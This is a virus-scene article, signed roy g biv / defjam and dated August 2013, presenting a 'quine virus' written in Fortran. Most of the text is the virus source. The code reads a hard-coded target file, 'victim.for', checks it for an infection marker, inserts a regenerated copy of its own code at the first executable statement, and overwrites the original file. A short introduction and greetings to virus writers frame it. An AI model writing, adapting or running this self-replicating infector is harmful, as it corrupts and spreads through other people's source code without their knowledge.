﻿                           Quine Viruses in Fortran
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

      character*xxxxa
      characterb,c,i
      integerd,e,f
c 9999 to support most size of code without calculation
c you can increase it, of course
      character*9999g
      character*10j
      character*74k
      a=
c place atoi(code,16) on next line, including all spaces
c max line is 72 characters, so continue with 'r' lines in pos 5
c max total line is 4024 characters, so uncomment (:4024) line if need it
     r''
c     a=a(:4024)//''
      b=char(10)
      c=char(39)
      d=1
c create string declaration and append atoi entire code
      do2,e=1,len(a),2
          f=ichar(a(e+1:))
          g(d:d)=char(ichar(a(e:))*16+f-f/64*7-816)
c automatically split lines when needed
          if(e.eq.279)then
              h=65
              do1,f=1,len(a)
                  g=g(:d)//a(f:f)
                  d=d+1
                  if(f.eq.h)then
                      if(f.ne.4025)then
                          g=g(:d)//b//'     r'
                          d=d+7
                          h=f+66
                      else
                          i=g(d:d)
                          g=g(:d-1)//c//b//'      a=a(:4024)//'//c//i
                          d=d+21
                          h=f+52
                      endif
                  endif
1             continue
          endif
          d=d+1
2     continue
c the file to infect.  we cannot enumerate the directory
c so hard-coded filename
      j='victim.for'
c open file
      open(1,file=j)
      f=0
      h=0
      l=0
c read file line by line
3     read(1,'(a)',end=6)k
      f=f+1
c watch for infection marker
      if(index(k,'quine').ne.0)then
          l=1
          goto6
      else if(h.eq.0)then
c tolower()
          do4,m=1,len(k)
              if(k(m:m).ge.'A')then
                  if(k(m:m).le.'Z')then
                      k(m:m)=char(ichar(k(m:))+32)
                  endif
              endif
4         continue
c watch for statement line
          if(index(k(:6),'      ').ne.0)then
c exclude variable declarations
              if(index(k,'real').eq.0)then
                  if(index(k,'common').eq.0)then
                      if(index(k,'double').eq.0)then
                          if(index(k,'record').eq.0)then
                              if(index(k,'complex').eq.0)then
                                  if(index(k,'integer').eq.0)then
                                      if(index(k,'logical').eq.0)then
                                          if(index(k,'character').eq.0)then
                                              if(index(k,'dimension').eq.0)then
                                                  if(index(k,'parameter').eq.0)then
c exclude structure blocks
                                                      if(index(k,'structure').ne.0)then
5                                                         read(1,'(a)')k
                                                          f=f+1
                                                          if(index(k,'structure').eq.0)then
                                                              goto5
                                                          endif
                                                      else
c remember first statement line
                                                          h=f
                                                      endif
                                                  endif
                                              endif
                                          endif
                                      endif
                                  endif
                              endif
                          endif
                      endif
                  endif
              endif
          endif
      endif
      goto3
6     close(1)
      if(l.eq.0)then
c write to temporary file
          open(1,file=j)
          open(2,file='r')
c place host code until first statement line, or rest of host
          do9,m=1,f+1
              if(m.ne.h)then
                  read(1,'(a)')k
                  e=len(k)
7                 if(k(e:e).eq.' ')then
                      e=e-1
                      goto7
                  endif
                  write(2,*)k(:e)
              else
c write code one line at a time
                  e=1
8                 f=index(g(e:),b)
                  write(2,*)g(e:e+f-2)
                  e=e+f
                  if(e.lt.d)then
                      goto8
                  endif
              endif
9         continue
          close(2)
          close(1)
c replace original file with temporary file
          open(1,file='r')
          open(2,file=j)
c skip round line number to hopefully avoid collision
11        read(1,'(a)',end=13)k
          e=len(k)
12        if(k(e:e).eq.' ')then
              e=e-1
              goto12
          endif
          write(2,*)k(:e)
          goto11
13        close(2)
          close(1,status='delete')
      endif
c Quine - roy g biv 29/08/13

      end


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam august 2013
iam_rgb@hotmail.com
